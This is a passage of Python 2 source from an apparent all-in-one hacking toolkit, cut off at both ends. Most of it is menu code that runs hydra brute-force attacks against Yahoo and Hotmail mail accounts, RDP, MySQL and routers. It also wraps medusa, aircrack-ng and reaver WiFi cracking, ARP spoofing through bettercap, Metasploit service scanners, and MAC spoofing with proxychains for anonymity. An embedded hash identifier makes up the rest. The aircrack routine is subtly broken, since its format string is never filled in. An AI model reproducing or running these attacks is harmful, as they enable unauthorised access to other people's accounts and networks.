+---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() + +def medusa(): + k = raw_input("\033[1mHost:\033[0m ") + u = raw_input("\033[1mUser:\033[0m ") + p = raw_input("\033[1mWordlist:\033[0m ") + os.system("medusa -d") + print "\n" + m = raw_input("\033[1mModule:\033[0m ") + n = raw_input("\033[1mPort:\033[0m ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) + +def aircrack(): + b = raw_input(G+"\033[1mBSSID: \033[0m") + e = raw_input(G+"\033[1mESSID: \033[0m") + w = raw_input(G+"\033[1mWordlist: \033[0m") + h = raw_input(G+"\033[1mHandshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"\033[1mInterface: \033[0m") + os.system("airmon-ng start " + i) + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) + os.system("airmon-ng stop " + i) + +def reaver(): + os.system("iwconfig") + j = raw_input("\033[1mSelect Interface:\033[0m ") + k = raw_input("\033[1mEnter BSSID:\033[0m ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) + +def password(): + print """ +{0}1: gmail +{1}2: instagram +{2}3: facebook +{3}4: hydra +{4}5: medusa +{5}6: aircrack-ng +{6}7: reaver +\033[0m +go back: go to main menu + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mAttack:\033[0m ") + if choice == "1": + gmail() + if choice == "2": + insta() + if choice == "3": + fb() + if choice == "4": + blackhydra() + if choice == "5": + medusa() + if choice == "6": + aircrack() + if choice == "7": + reaver() + if choice == "go back": + os.system("") + + except: + print "\n" + +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + +def monitoron(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def monitoroff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) + +def command(): + command = raw_input("\033[1mCommand:\033[0m ") + os.system(command) + +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python /root/hackers-tool-kit/htk-lite/htkl.py --quickrun') + + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() + +def sysinfo(): + os.system("iwconfig") + k = raw_input("\033[1mInterface:\033[0m ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system("uname -a") + os.system("whoami") + +def netscan(): + print """ +{0}1: scan for devices in your network + +{1}2: scan for networks around you +\033[0m +go back: go back to main menu + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mScan:\033[0m ") + + if choice == "1": + os.system("netdiscover") + if choice == "2": + os.system("iwconfig") + m = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("airmon-ng start " + m) + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("\033[1m[y/n]>\033[0m ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) + os.system("airmon-ng stop " + i) + if choice == "go back": + os.system("") + except: + print "\n" + +def verscan(): + print """ +Services available: + +{0}ssh + +{1}mysql +\033[0m + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + service = raw_input("\033[1mService: \033[0m") + if service == "ssh": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + b = raw_input(G+"\033[1mTimeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system('echo "exit\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r sshver.rc') + os.system('rm -rf sshver.rc') + + if service == "mysql": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system('echo "exit\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') + except: + print "\n" + +def wordlist(): + os.system("cd wordlists && cupp -i") + print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" + +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("\033[1mTarget/s:\033[0m ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") + +def traff(): + os.system("iwconfig") + s = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("tcpdump -i " + s) + +def hashid(): + try: + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and 